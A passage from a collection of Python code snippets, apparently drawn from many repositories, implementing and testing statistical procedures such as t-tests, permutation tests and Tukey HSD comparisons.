abs(obs_cond[cond])) / n_shuffles for cond in obs_cond.keys()}\n \n print('Complete')\n return(obs_cond, perm_cond, maxT, p_ph)", "def test_all_pairs_t_test_few_perms(self):\r\n exp = \"\"\"# The tests of significance were performed using a one-sided (low) Student's two-sample t-test.\r\n# Alternative hypothesis: Group 1 mean < Group 2 mean\r\n# The nonparametric p-values were calculated using 5 Monte Carlo permutations.\r\n# The nonparametric p-values contain the correct number of significant digits.\r\n# Entries marked with \"N/A\" could not be calculated because at least one of the groups\r\n# of distances was empty, both groups each contained only a single distance, or\r\n# the test could not be performed (e.g. no variance in groups with the same mean).\r\nGroup 1\tGroup 2\tt statistic\tParametric p-value\tParametric p-value (Bonferroni-corrected)\tNonparametric p-value\tNonparametric p-value (Bonferroni-corrected)\r\nfoo\tbar\t-6.6\t0.00354023978206\t0.0106207193462\tToo few iters to compute p-value (num_iters=5)\tToo few iters to compute p-value (num_iters=5)\r\nfoo\tbaz\t-9.79795897113\t0.000304092472232\t0.000912277416695\tToo few iters to compute p-value (num_iters=5)\tToo few iters to compute p-value (num_iters=5)\r\nbar\tbaz\t-3.0\t0.0288344428112\t0.0865033284337\tToo few iters to compute p-value (num_iters=5)\tToo few iters to compute p-value (num_iters=5)\r\n\"\"\"\r\n obs = all_pairs_t_test(self.labels2, self.dists2,\r\n num_permutations=5, tail_type='low')\r\n self.assertEqual(self.remove_nums(obs), self.remove_nums(exp))", "def compare_samples(populations,parametric=False):\n from scipy.stats import mannwhitneyu, ttest_ind, f_oneway, kruskal, ranksums\n from statsmodels.stats.multicomp import pairwise_tukeyhsd\n populations = [np.array(pop) for pop in populations] #obscure line to take out missing values\n populations = [pop[~np.isnan(pop)] for pop in populations]\n\n if len(populations) == 2:\n if parametric:\n stat, p_value = ttest_ind(*populations)\n print(\"P-value t-test: {0:2.10f}\".format(p_value))\n else:\n stat, p_value1 = mannwhitneyu(*populations)\n print(\"P-value MWW: {0:2.10f}\".format(p_value))\n stat, p_value2 = ranksums(*populations)\n print(\"P-value Ranksum: {0:2.10f}\".format(p_value))\n \n if len(populations) > 2:\n if parametric:\n stat, p_value = f_oneway(*populations)\n print(\"P-value anova: {0:2.10f}\".format(p_value))\n else:\n stat, p_value = kruskal(*populations) \n print(\"P-value kruskal: {0:2.10f}\".format(p_value))\n \n if p_value < 0.05:\n flatten_pop = []\n label_pop = []\n for i,pop in enumerate(populations):\n flatten_pop += list(pop)\n label_pop += [\"pop{0}\".format(i)]*len(pop)\n \n res2 = pairwise_tukeyhsd(np.asarray(flatten_pop),label_pop)\n print(\"Printing pair comparisons using Tukey HSD\")\n print(res2)\n res2.plot_simultaneous(comparison_name=None,xlabel='diffs',ylabel='grups')\n \n print((\"Means: \" + \", {}\"*len(populations)).format(*[np.mean(_) for _ in populations]))\n print((\"STDs: \" + \", {}\"*len(populations)).format(*[np.std(_) for _ in populations]))\n \n \n return p_value", "def lttest_1samp(a,popmean,printit=0,name='Sample',writemode='a'):\r\n x = mean(a)\r\n v = var(a)\r\n n = len(a)\r\n df = n-1\r\n svar = ((n-1)*v)/float(df)\r\n t = (x-popmean)/math.sqrt(svar*(1.0/n))\r\n prob = betai(0.5*df,0.5,float(df)/(df+t*t))\r\n\r\n if printit <> 0:\r\n statname = 'Single-sample T-test.'\r\n outputpairedstats(printit,writemode,\r\n 'Population','--',popmean,0,0,0,\r\n name,n,x,v,min(a),max(a),\r\n statname,t,prob)\r\n return t,prob", "def permutation_test_score(self, estimator, y, n_permutations=100):\n\n return nmf_permutation_test_score(estimator, y, n_permutations=n_permutations)", "def permutation_test_score(self, estimator, y, n_permutations=100):\n\n return nmf_permutation_test_score(estimator, y, n_permutations=n_permutations, verbose=self.verbose)", "def manual_perm_test(model: 'Fitted sklearn estimator',\n X: 'Pandas df',\n y: 'Pandas series',\n true_score: float,\n n_permutations: int=10000,\n plot: bool=True,\n clf: bool=False) -> 'p-value, null_counts':\n\n scores = [] # Empty list for null distribution scores\n n_perms = range(1, n_permutations, 1) # Range of values to permute\n for n in tqdm(n_perms, desc='Permutation test'): # tqdm for progress bar\n X_train, X_test, y_train, y_test = train_test_split(\n X, y, stratify=y, test_size=0.90, random_state=n\n )\n model.fit(X_train, y_train)\n y_test_perm = np.random.permutation(y_test) # Permuting class labels\n chance_scores = round(model.score(X=X_test, y=y_test_perm), 4)\n scores.append(chance_scores)\n\n # Converting to a pandas dataframe\n perm_scores_df = pd.DataFrame(data=scores, columns=['null_dist'])\n perm_scores_df['null_dist'] *= 100\n null_counts = (\n perm_scores_df # Counts greater than or equal to our test set score\n .loc[(perm_scores_df['null_dist']) >= true_score]\n .count()\n .iloc[0]\n )\n p_value = (null_counts + 1) / (n_permutations + 1)\n p_value = np.round(p_value, decimals=5)\n\n if plot is True: # Plotting a histogram of permutation scores\n plt.figure(figsize=(10, 10))\n sns.distplot(a=perm_scores_df['null_dist'],\n hist=True,\n label='Permutation scores')\n ylim = plt.ylim()\n if clf is False:\n # True classifier score and p-value\n plt.plot(2 * [true_score],\n ylim,\n '--g',\n linewidth=3,\n label='R2 score %s (pvalue : %s)' %\n (true_score, p_value))\n else:\n plt.plot(2 * [true_score],\n ylim,\n '--g',\n linewidth=3,\n label='Multimodal AUC score: %s (pvalue = %s)' %\n (true_score, p_value))\n n_classes = np.unique(y).size\n chance = 2 * [100. / n_classes]\n plt.plot(chance,\n ylim,\n '--k',\n linewidth=3,\n label='Null model mean AUC score: %s' % 50.00)\n \n plt.ylim(ylim)\n plt.legend(loc='lower center', bbox_to_anchor=(0.5, -0.38))\n plt.tight_layout()\n\n if clf is False:\n plt.xlabel(xlabel='R2 Scores')\n else:\n plt.xlabel(xlabel='AUC Scores')\n plt.title(label='Null Distribution')\n plt.savefig('quadratic_null_dist.png', dpi=300, bbox_inches='tight')\n plt.show()\n\n return p_value, null_counts", "def _t_test(_sample_a, _sample_b):\n res = stats.ttest_ind(_sample_a, _sample_b, axis=0, equal_var=equal_var, nan_policy='propagate')\n print('Independent t-test\\nt-statistic: {}\\np-value: {}'.format(res[0], res[1]))\n print('-' * 10)", "def attest_1samp(a,popmean,printit=0,name='Sample',writemode='a'):\r\n if type(a) != N.ndarray:\r\n a = N.array(a)\r\n x = amean(a)\r\n v = avar(a)\r\n n = len(a)\r\n df = n-1\r\n svar = ((n-1)*v) / float(df)\r\n t = (x-popmean)/math.sqrt(svar*(1.0/n))\r\n prob = abetai(0.5*df,0.5,df/(df+t*t))\r\n\r\n if printit <> 0:\r\n statname = 'Single-sample T-test.'\r\n outputpairedstats(printit,writemode,\r\n 'Population','--',popmean,0,0,0,\r\n name,n,x,v,N.minimum.reduce(N.ravel(a)),\r\n N.maximum.reduce(N.ravel(a)),\r\n statname,t,prob)\r\n return t,prob", "def test_permutation(perm):\n n_src = len(perm)\n perm_tensor = torch.Tensor(perm)\n source_base = torch.ones(1, n_src, 10)\n sources = torch.arange(n_src).unsqueeze(-1) * source_base\n est_sources = perm_tensor.unsqueeze(-1) * source_base\n\n loss_func = PITLossWrapper(pairwise_mse)\n loss_value, reordered = loss_func(est_sources, sources, return_est=True)\n\n assert loss_value.item() == 0\n assert_allclose(sources, reordered)", "def test_permutations(experiment, verbose=False):\n topics = experiment.topics\n no_topics = len(topics) # The total number of topics used for the given experiment.\n no_permutations = experiment.n # The total number of possible permutations.\n\n if verbose:\n print \"Topics: {0} (total of {1})\".format(topics, no_topics)\n print \"Total permutations: {0}\".format(no_permutations)\n print\n\n for i in range(0, no_permutations):\n rotations = experiment.get_rotations(i)\n\n if verbose:\n print \"Permutation {0} ({1})\".format(i, rotations)\n\n for k in range(0, no_topics):\n rotation_topic = experiment.get_rotation_topic(i, k)\n\n if verbose:\n print \"\\tTopic {0} at permutation list position {1}\".format(rotation_topic, k)\n\n if experiment.get_rotations(i)[k] == experiment.get_rotation_topic(i, k):\n if verbose:\n print \"\\t\\tPASS\"\n else:\n if verbose:\n print \"\\t\\tFAIL\"\n return False\n\n if verbose:\n print \"Permutation check PASSED\"\n\n return True", "def ttest(x, mu=0, alpha=0.05, is_bernoulli=False, two_sided=True, return_tuple=False):\n\n # Define test degrees of freedom\n if two_sided:\n quant_order = 1 - (alpha / 2)\n h0 = f'X_bar = {mu}'\n h1 = f'X_bar != {mu}'\n else:\n quant_order = 1 - alpha\n h0 = f'X_bar <= {mu}'\n h1 = f'X_bar > {mu}'\n\n # Input vector as array\n x = np.asarray(x)\n # Sample size\n n = len(x)\n\n # Empirical mean\n x_bar = x.mean()\n # s estimator (variance)\n if is_bernoulli:\n s2 = x_bar * (1 - x_bar)\n else:\n s2 = desc.var(x)\n\n # Degrees of freedom\n df = n - 1\n\n # T statistic\n t = (x_bar - mu) / (math.sqrt(s2 / n))\n if two_sided:\n t = math.fabs(t)\n # p and critical values\n p = 2.0 * (1.0 - scp.t.cdf(t, df=df))\n\n if n > 30:\n cv = scp.norm.ppf(quant_order)\n else:\n cv = scp.t.ppf(quant_order, df=df)\n\n _summ = test_summary(df=df, critical_value=cv, t_value=t,\n p_value=p,\n title='One Sample Student test',\n h0=h0, h1=h1,\n alpha=alpha)\n\n if return_tuple:\n return t, cv, p\n else:\n return _summ", "def ttest_review(sample_1, sample_2, alpha=.05):\n\n result = stats.ttest_ind(sample_1, sample_2)\n crit_val, p_val = result\n \n ## Creating interpretation based on p-value results.\n\n if p_val < .05:\n print(f'The feature is statistically significant with a p-value of {p_val}.')\n\n else:\n print(f'The feature is not statistically significant with a p-value of {p_val}.')\n \n return p_val", "def permutation_test(overlap_bins, nonoverlap_bins, thresh, ntrials):\n X = num_top_snps(I(overlap_bins.values()), thresh)\n if X == 0:\n return thresh, 0, 0, 0, 1, 0, 0\n overlap_counts = {k: len(overlap_bins[k]) for k in overlap_bins}\n Y = [num_top_snps(match(overlap_counts, nonoverlap_bins), thresh) for _ in range(ntrials)]\n mean, variance = moments(Y)\n anderson, critical_values, _ = scipy.stats.anderson(Y)\n exact_p = (1 + len([y for y in Y if y >= X])) / (1 + ntrials)\n return thresh, X, mean, variance, exact_p, anderson, critical_values[2]", "def test_p_tilda(self, test_inputs, random_inputs, training):\n \n self.batch_size = test_inputs.shape[0]\n \n self.num_samples = random_inputs.shape[0]\n \n self.add_p_tilda(training = training)\n \n var_list = [self.x, self.x_tilda]\n \n get_p_tilda = theano.function(inputs = var_list,\n outputs= self.p_tilda)\n \n probs = get_p_tilda(test_inputs, random_inputs)\n \n si = self.batch_size+self.np_rand_gen.choice(self.num_samples, 10, False)\n \n return probs[0:self.batch_size], probs[si]", "def test_permutation(self):\r\n # Check over two calls to see if the random state is correctly updated.\r\n random = RandomStreams(utt.fetch_seed())\r\n fn = function([], random.permutation((20,), 10), updates=random.updates())\r\n\r\n fn_val0 = fn()\r\n fn_val1 = fn()\r\n\r\n rng_seed = numpy.random.RandomState(utt.fetch_seed()).randint(2**30)\r\n rng = numpy.random.RandomState(int(rng_seed)) #int() is for 32bit\r\n\r\n # rng.permutation outputs one vector at a time, so we iterate.\r\n numpy_val0 = numpy.asarray([rng.permutation(10) for i in range(20)])\r\n numpy_val1 = numpy.asarray([rng.permutation(10) for i in range(20)])\r\n\r\n assert numpy.all(fn_val0 == numpy_val0)\r\n assert numpy.all(fn_val1 == numpy_val1)", "def paired_permutation_test(D1, a, b, tradeoff, threshold=0.05, R=10000, verbose=1):\n\n # extract the scores by example for each system\n A = D1[D1.policy == a]\n B = D1[D1.policy == b]\n assert (A.example == B.example).all()\n assert (A.index == B.index).all()\n\n W = B.want.sum() # number of thing we want is constant among permutations\n n = len(A.index)\n\n AC = np.array(A.want_and_got) * 1.0\n AG = np.array(A.got) * 1.0\n A_runtime = np.array(A.pushes) * 1.0\n\n BC = np.array(B.want_and_got) * 1.0\n BG = np.array(B.got) * 1.0\n B_runtime = np.array(B.pushes) * 1.0\n\n # observed value of test statistic -- the difference of rewards.\n T_observed = test_statistic(AC, AG, A_runtime,\n BC, BG, B_runtime,\n np.zeros(n, dtype=np.int32), W, tradeoff)\n\n r = 0.0\n for _ in iterview(range(R), msg='perm test'):\n # randomly generate a vector of zeros and ones (uniformly).\n # Note: endpoint not included in np.random.randit (that's why theres a 2).\n flip = np.random.randint(0, 2, size=n).astype(np.int32)\n if test_statistic(AC, AG, A_runtime,\n BC, BG, B_runtime,\n flip, W, tradeoff) >= T_observed:\n r += 1\n s = (r+1)/(R+1)\n\n # observed rewards\n ra = cgw_f(AC.sum(), AG.sum(), W) - tradeoff*A_runtime.mean()\n rb = cgw_f(BC.sum(), BG.sum(), W) - tradeoff*B_runtime.mean()\n\n if verbose:\n # which system has higher reward? is it significant?\n asig = (red % bold) if ra > rb and s <= 0.05 else '%s'\n bsig = (blue % bold) if rb > ra and s <= 0.05 else '%s'\n any_sig = bold if s <= threshold else yellow\n\n print asig % 'R(A) = %g (%s)' % (ra, a)\n print bsig % 'R(B) = %g (%s)' % (rb, b)\n print any_sig % 'confidence = %g' % (1-s)\n print\n\n if s <= threshold:\n return s, -1 if ra > rb else +1\n else:\n return s, 0 # \"statistical tie\"", "def run_paired_t(data_generator):\r\n test_stats, pvals = [], []\r\n for b_data, a_data in data_generator:\r\n test_stat, pval = t_paired(b_data, a_data)\r\n test_stats.append(test_stat)\r\n pvals.append(pval)\r\n return test_stats, pvals", "def mc_t_two_sample(x_items, y_items, tails=None, permutations=999,\r\n exp_diff=0):\r\n if tails is not None and tails != 'high' and tails != 'low':\r\n raise ValueError(\"Invalid tail type '%s'. Must be either None, \"\r\n \"'high', or 'low'.\" % tails)\r\n if permutations < 0:\r\n raise ValueError(\"Invalid number of permutations: %d. Must be greater \"\r\n \"than or equal to zero.\" % permutations)\r\n\r\n if (len(x_items) == 1 and len(y_items) == 1) or \\\r\n (len(x_items) < 1 or len(y_items) < 1):\r\n raise ValueError(\"At least one of the sequences of observations is \"\r\n \"empty, or the sequences each contain only a single \"\r\n \"observation. Cannot perform the t-test.\")\r\n\r\n # Perform t-test using original observations.\r\n obs_t, param_p_val = t_two_sample(x_items, y_items, tails=tails,\r\n exp_diff=exp_diff,\r\n none_on_zero_variance=False)\r\n\r\n # Only perform the Monte Carlo test if we got a sane answer back from the\r\n # initial t-test and we have been specified permutations.\r\n nonparam_p_val = nan\r\n perm_t_stats = []\r\n if permutations > 0 and not (isnan(obs_t) or isnan(param_p_val)):\r\n # Permute observations between x_items and y_items the specified number\r\n # of times.\r\n perm_x_items, perm_y_items = _permute_observations(x_items, y_items,\r\n permutations)\r\n perm_t_stats = [t_two_sample(perm_x_items[n], perm_y_items[n],\r\n tails=tails, exp_diff=exp_diff,\r\n none_on_zero_variance=False)[0]\r\n for n in range(permutations)]\r\n\r\n # Compute nonparametric p-value based on the permuted t-test results.\r\n if tails is None:\r\n better = (absolute(array(perm_t_stats)) >= absolute(obs_t)).sum()\r\n elif tails == 'low':\r\n better = (array(perm_t_stats) <= obs_t).sum()\r\n elif tails == 'high':\r\n better = (array(perm_t_stats) >= obs_t).sum()\r\n nonparam_p_val = (better + 1) / (permutations + 1)\r\n return obs_t, param_p_val, perm_t_stats, nonparam_p_val", "def permutation(data, dataLabel=None, nperm=10000, decimals=4):\n\n # test calling values\n if data is None or not isinstance(data, dict) or len(data.keys()) != 2:\n raise ValueError('RSTATS.permutation: data must be'\n + ' a dictionary with at exactly 2 keys'\n + '\\nUse KW (anova) for more than 2 groups')\n\n k = list(data.keys())\n\n g1 = data[k[0]]\n g2 = data[k[1]]\n # (w1, p1) = Stats.shapiro(g1, a=None, reta=False)\n # (w2, p2) = Stats.shapiro(g2, a=None, reta=False)\n\n combined = np.concatenate((g1, g2))\n diffobs = np.mean(g2)-np.mean(g1)\n diffs = np.zeros(nperm)\n nperm = nperm\n index = range(0, combined.shape[0])\n for i in range(nperm):\n # draw from combined data set without replacement\n #shuff = np.random.randint(combined.shape[0], size=combined.shape[0])\n shuff = np.random.permutation(index)\n ar = combined[shuff[0:len(g1)]]\n br = combined[shuff[len(g1):]]\n diffs[i] = np.mean(br) - np.mean(ar)\n pvalue = np.sum(np.abs(diffs) >= np.abs(diffobs)) / float(nperm)\n if dataLabel is not None:\n print ('\\n%s: Permutation Test (Nperm = %d)' % (dataLabel, nperm))\n # if p1 < 0.05 and p2 < 0.05:\n # print(u' Both data sets appear normally distributed: Shapiro-Wilk Group 1 p = {:6.3f}, Group2 p = {:6.3f}'.format(p1, p2))\n # else:\n # print(u' ****At least one Data set is NOT normally distributed****\\n Shapiro-Wilk Group 1 p = {:6.3f}, Group2 p = {:6.3f}'.format(p1, p2))\n # print (u' (Permutation test does not depend on distribution)')\n \n n = max([len(l) for l in k])\n print(u' {:s}={:8.{pc}f} \\u00B1{:.{pc}f}, {:d} (mean, SD, N)'.\n format(k[0].rjust(n), np.mean(g1), np.std(g1, ddof=1),\n len(g1), pc=decimals))\n print(u' {:s}={:8.{pc}f} \\u00B1{:.{pc}f}, {:d} (mean, SD, N)'.\n format(k[1].rjust(n), np.mean(g2), np.std(g2, ddof=1),\n len(g2), pc=decimals))\n summarizeData(data, decimals=decimals)\n # iqr1 = np.subtract(*np.percentile(g1, [75, 25]))\n # iqr2 = np.subtract(*np.percentile(g2, [75, 25]))\n # print(u' {:s}: median={:8.4f} IQR={:8.4f}'.format(k[0].rjust(n), np.median(g1), iqr1))\n # print(u' {:s}: median={:8.4f} IQR={:8.4f}'.format(k[1].rjust(n), np.median(g2), iqr2))\n print(u' Observed difference: {:8.4f}'.format(diffobs))\n print(u' p={:8.6f}, Nperm={:8d}\\n'.format(float(pvalue), int(nperm)))\n return(pvalue, nperm)", "def entropy_permutation_test(ordered_pitch_types, single_pitch_pdf, conditional_joint_probabilities, total_transitions,\n n=1000):\n pitch_types, pitch_probabilities = zip(*single_pitch_pdf.items())\n permutation_entropies = []\n progress = progressbar.ProgressBar()\n\n for test_number in progress(xrange(n)):\n # create the new matrix\n permutation_counts = {}\n for first_pitch_type in ordered_pitch_types:\n permutation_counts[first_pitch_type] = {}\n for second_pitch_type in ordered_pitch_types:\n permutation_counts[first_pitch_type][second_pitch_type] = 0\n\n pitch_permutation = numpy.random.choice(pitch_types, total_transitions, p=pitch_probabilities)\n current_pitch = numpy.random.choice(pitch_types, p=pitch_probabilities)\n for next_pitch in pitch_permutation:\n permutation_counts[current_pitch][next_pitch] += 1\n current_pitch = next_pitch\n\n joint_probabilities, _, _ = joint_probabilities_from_transitions(ordered_pitch_types, permutation_counts)\n permutation_entropies.append(entropy_from_probability_matrix(joint_probabilities))\n\n joint_entropy = entropy_from_probability_matrix(conditional_joint_probabilities)\n # print 'Mean', numpy.mean(permutation_entropies)\n # print 'Standard deviation', numpy.std(permutation_entropies)\n # tdof, tloc, tscale = stats.t.fit(permutation_entropies)\n # print 'DF', tdof, 'Loc (mean)', tloc, 'Scale (SD)', tscale\n # t_score = (joint_entropy - tloc) / tscale\n # print stats.t.cdf(joint_entropy, df=tdof, loc=tloc, scale=tscale)\n\n mean, stddev = stats.norm.fit(permutation_entropies)\n print 'Mean = {mean}\\t StdDev = {stddev}'.format(mean=mean, stddev=stddev)\n z_score = (joint_entropy - mean) / stddev\n p_value = stats.norm.cdf(joint_entropy, mean, stddev)\n print 'The joint entropy has a Z-score of {z_score} which gives a P-value of {p_value}'.format(z_score=z_score,\n p_value=p_value)\n return z_score, p_value", "def test_all_pairs_t_test_no_perms(self):\r\n exp = \"\"\"# The tests of significance were performed using a two-sided Student's two-sample t-test.\r\n# Alternative hypothesis: Group 1 mean != Group 2 mean\r\n# Entries marked with \"N/A\" could not be calculated because at least one of the groups\r\n# of distances was empty, both groups each contained only a single distance, or\r\n# the test could not be performed (e.g. no variance in groups with the same mean).\r\nGroup 1\tGroup 2\tt statistic\tParametric p-value\tParametric p-value (Bonferroni-corrected)\tNonparametric p-value\tNonparametric p-value (Bonferroni-corrected)\r\nfoo\tbar\t-6.6\t0.00708047956412\t0.0212414386924\tN/A\tN/A\r\nfoo\tbaz\t-9.79795897113\t0.000608184944463\t0.00182455483339\tN/A\tN/A\r\nbar\tbaz\t-3.0\t0.0576688856224\t0.173006656867\tN/A\tN/A\r\n\"\"\"\r\n obs = all_pairs_t_test(self.labels2, self.dists2,\r\n num_permutations=0)\r\n self.assertEqual(self.remove_nums(obs), self.remove_nums(exp))", "def ttest():\n # open test results and perform regression analysis\n alphas = []\n betas = []\n iterations = {}\n with open(f\"Results/conclusion2.csv\") as f:\n csv_reader = csv.reader(f, delimiter=',')\n\n for run in csv_reader:\n max, max_i = get_max_run(run)\n if int(run[0]) not in iterations:\n iterations[int(run[0])] = {100 - int(run[1])-1: int(max)}\n else:\n iterations[int(run[0])][100 - int(run[1])-1] = int(max)\n\n for iteration in iterations:\n mono_levels = list(iterations[iteration].keys())\n pop_sizes = [iterations[iteration][i] for i in mono_levels]\n\n regress_result = regress(pop_sizes, mono_levels)\n alphas += [regress_result[1]]\n betas += [regress_result[0]]\n\n # plot scatter and regression line\n avg_alpha = sum(alphas)/len(alphas)\n avg_beta = sum(betas)/len(betas)\n stddev_beta = np.std(betas)\n vis.scatter_mono(iterations, avg_alpha, avg_beta)\n\n # perform t-test\n ttest_result = stats.ttest_ind(betas, [0 for i in betas], equal_var=True)\n t_stat = ttest_result[0]\n p_value = ttest_result[1]\n print(f'Results from t-test:')\n print(f'Avg beta: {avg_beta}, stddev beta: {stddev_beta}.')\n print(f't-stat: {t_stat}, p-value: {p_value}.')", "def posthoc_ttests(dataframe, var_='dVz'):\n posthocs = pg.pairwise_ttests(data=dataframe, dv=var_, within='block', subject='user', between='condition',\n alpha=0.05, within_first=False,\n padjust='fdr_by', marginal=True, return_desc=True, tail='one-sided', parametric=True)\n return posthocs", "def ttest(self, data: ['SASdata', str] = None,\n by: str = None,\n cls: [str, list] = None,\n freq: str = None,\n paired: str = None,\n var: str = None,\n weight: str = None,\n procopts: str = None,\n stmtpassthrough: str = None,\n **kwargs: dict) -> SASresults:", "def _perm_stat(self, index): # pragma: no cover\n\n permu = np.random.permutation(self.u)\n permv = np.random.permutation(self.v)\n\n # calculate permuted statics, store in null distribution\n perm_stat = self.indep_test._statistic(permu, permv)\n\n return perm_stat", "def t_test(sample1, sample2, paired=False, alpha=0.05,\n alternative='two-sided', correction='auto', r=0.707,\n show_graph=True, **kwargs):\n confidence = 1 - alpha\n df_result = pg.ttest(\n sample1,\n sample2,\n paired=paired,\n confidence=confidence,\n alternative=alternative,\n correction=correction,\n r=r\n )\n if show_graph:\n if paired:\n difference = [x - y for x, y in zip(sample1, sample2)]\n Visualization.histogram(difference, **kwargs)\n else:\n Visualization.density_plot(sample1, sample2,\n fig_size=(5, 4), **kwargs)\n return HypothesisTester.define_hypothesis(df_result, 'mean',\n alternative, paired,\n alpha).T", "def test_pairwise(self, test_type='t-test'):\n return pair_tests(self.evaluations, test_type, self.diff_var, self.dof)", "def t_one_sample(x, mu, tails=2):\n assert tails in (1,2), \"invalid: tails must be 1 or 2, found %s\"%str(tails)\n x = np.asarray(x)\n N = x.size\n df = N - 1\n t_obs = (x.mean() - mu) / (x.std() / np.sqrt(N))\n p_value = tails * st.t.sf(abs(t_obs), df)\n return TtestResults(t_obs, p_value)", "def ttest_two(samp_file, ctrl_file, fileout, p=0.01):\n np_samp = np.loadtxt(samp_file, delimiter=',', dtype=object)\n np_ctrl = np.loadtxt(ctrl_file, delimiter=',', dtype=object)\n count = np_samp.shape[0]\n if np_samp.shape[0] != np_ctrl.shape[0]:\n raise ValueError(\"Number of windows between sample and control files are different!\")\n ot = np.zeros((count, 9), dtype=object) # array to hold info for each bin\n wig = open(fileout + \".wig\", \"w\")\n chr_i = None\n prev = 0\n chr_ctrl = np_ctrl[:, 0] # chr\n chr_samp = np_samp[:, 0]\n ran_ctrl = np_ctrl[:, 1:3].astype(int) # start and end coordinates\n ran_samp = np_samp[:, 1:3].astype(int)\n bin_ctrl = np_ctrl[:, 3:].astype(int) # bins\n bin_samp = np_samp[:, 3:].astype(int)\n for i in range(count):\n if chr_samp[i] != chr_ctrl[i] or ran_samp[i, 0] != ran_ctrl[i, 0] \\\n or ran_samp[i, 1] != ran_ctrl[i, 1]:\n raise ValueError(\"Between sample and control files, the chr, start, or end coordinates \"\n \"are different!\")\n else:\n if chr_samp[i] != chr_i:\n chr_i = chr_samp[i]\n wig.write(\"variableStep\\tchrom=%s\\n\" % chr_i)\n ot[i, 0:3] = np_samp[i, 0:3] # chr, start, and end coordinates\n ot[i, 3] = np.sum(bin_ctrl[i, :]) # sum of ctrl\n ot[i, 4] = np.sum(bin_samp[i, :]) # sum of sample\n ttest = stats.ttest_rel(bin_samp[i, :], bin_ctrl[i, :])\n ot[i, 5] = ttest[0] # t test\n ot[i, 6] = ttest[1] # t test\n start_i = ran_samp[i, 0]\n if ot[i, 5] > 0 and ot[i, 6] / 2 < p / count: # one-sided t-test with Bonferroni\n ot[i, 7] = 1\n ot[i, 8] = start_i - prev\n prev = start_i\n wig.write(\"%i\\t%i\\n\" % (start_i, 1))\n else:\n ot[i, 7] = np.nan\n ot[i, 8] = np.nan\n wig.write(\"%i\\t%i\\n\" % (start_i, 0))\n status_statement(i, count, 20, chr_i)\n wig.close()\n np.savetxt(fileout + \"_ttest.csv\", ot, fmt='%s', delimiter=',')", "def test_permutation(self):\r\n # Check over two calls to see if the random state is correctly updated.\r\n m = Module()\r\n m.random = RandomStreams(utt.fetch_seed())\r\n m.fn = Method([], m.random.permutation((20,), 10))\r\n\r\n made = m.make()\r\n made.random.initialize()\r\n fn_val0 = made.fn()\r\n fn_val1 = made.fn()\r\n\r\n rng_seed = numpy.random.RandomState(utt.fetch_seed()).randint(2**30)\r\n rng = numpy.random.RandomState(int(rng_seed)) #int() is for 32bit\r\n\r\n # rng.permutation outputs one vector at a time, so we iterate.\r\n numpy_val0 = numpy.asarray([rng.permutation(10) for i in range(20)])\r\n numpy_val1 = numpy.asarray([rng.permutation(10) for i in range(20)])\r\n\r\n assert numpy.all(fn_val0 == numpy_val0)\r\n assert numpy.all(fn_val1 == numpy_val1)", "def all_pairs_t_test(labels, dists, tail_type='two-sided',\r\n num_permutations=999):\r\n result = ''\r\n\r\n if len(labels) != len(dists):\r\n raise ValueError(\"The number of distribution labels must match the \"\r\n \"number of distributions.\")\r\n if tail_type not in tail_types:\r\n raise ValueError(\"Invalid tail type '%s'. Must be one of %r.\" %\r\n (tail_type, tail_types))\r\n if num_permutations < 0:\r\n raise ValueError(\"Invalid number of permutations: %d. Must be greater \"\r\n \"than or equal to zero.\" % num_permutations)\r\n\r\n result += '# The tests of significance were performed using a ' + \\\r\n tail_type_desc[tail_type][0] + ' Student\\'s two-sample t-test.\\n'\r\n\r\n result += ('# Alternative hypothesis: Group 1 mean %s Group 2 mean\\n' %\r\n tail_type_desc[tail_type][1])\r\n\r\n if num_permutations > 0:\r\n result += '# The nonparametric p-values were calculated using ' + \\\r\n '%d Monte Carlo permutations.\\n' % num_permutations\r\n result += '# The nonparametric p-values contain the correct ' + \\\r\n 'number of significant digits.\\n'\r\n\r\n result += '# Entries marked with \"N/A\" could not be calculated because ' + \\\r\n 'at least one of the groups\\n# of distances was empty, ' + \\\r\n 'both groups each contained only a single distance, or\\n' + \\\r\n '# the test could not be performed (e.g. no variance in ' + \\\r\n 'groups with the same mean).\\nGroup 1\\tGroup 2\\t' + \\\r\n 't statistic\\tParametric p-value\\tParametric p-value ' + \\\r\n '(Bonferroni-corrected)\\tNonparametric p-value\\t' + \\\r\n 'Nonparametric p-value (Bonferroni-corrected)\\n'\r\n\r\n stats = _perform_pairwise_tests(labels, dists, tail_type, num_permutations)\r\n for stat in stats:\r\n stat = ['N/A' if e is nan else e for e in stat]\r\n result += '%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\n' % (stat[0], stat[1], stat[2],\r\n stat[3], stat[4],\r\n format_p_value_for_num_iters(stat[5], num_permutations) if\r\n stat[5] != 'N/A' else 'N/A',\r\n format_p_value_for_num_iters(stat[6], num_permutations) if\r\n stat[6] != 'N/A' else 'N/A')\r\n return result", "def test_mc_t_two_sample_no_permuted_variance(self):\r\n # Verified against R's t.test() and Deducer::perm.t.test().\r\n x = array([1, 1, 2])\r\n y = array([2, 2, 1])\r\n\r\n exp = (-0.70710678118654791, 0.51851851851851838)\r\n obs = mc_t_two_sample(x, y, permutations=10000)\r\n\r\n self.assertFloatEqual(obs[:2], exp)\r\n self.assertEqual(len(obs[2]), 10000)\r\n self.assertCorrectPValue(0.97, 1.0, mc_t_two_sample, [x, y],\r\n {'permutations': 10000}, p_val_idx=3)", "def t_paired(x, y, mu=0, tails=2):\n assert tails in (1,2), \"invalid: tails must be 1 or 2, found %s\"%str(tails)\n x, y = np.asarray(x), np.asarray(y)\n x_d = x - y\n N = x_d.size\n df = 2 * N - 2\n t_obs = (x_d.mean() - mu) / (x_d.std() / np.sqrt(N))\n p_value = tails * st.t.sf(abs(t_obs), df)\n return TtestResults(t_obs, p_value)", "def simulate_lof_scores(table, n_permutations, genes, samples, summary_func):\n perm_scores = []\n print(\"Permuting mutation data\", n_permutations, \"times:\", end=' ',\n file=sys.stderr)\n for idx in range(n_permutations):\n print(idx + 1, end=' ', file=sys.stderr)\n permute_table(table)\n ptable = make_lof_table(table, genes, samples, summary_func)\n perm_scores.extend(s for g, s in\n lof_sig_scores(ptable, samples, False))\n perm_scores = numpy.asfarray(sorted(perm_scores))\n print(\"\\nMax permutation score:\", perm_scores[-1], file=sys.stderr)\n return perm_scores", "def permTS(dataDict=None, dataLabel='data', mode='exact.ce'):\n\n # test calling values\n if mode not in ['exact.ce', 'exact.mc']:\n raise ValueError('RStats.permTS: Mode must be either'\n + ' \"exact.ce\" or \"exact.mc\"; got %s' % mode)\n if dataDict is None or not (isinstance(dataDict, dict) \n or len(dataDict.keys()) != 2):\n raise 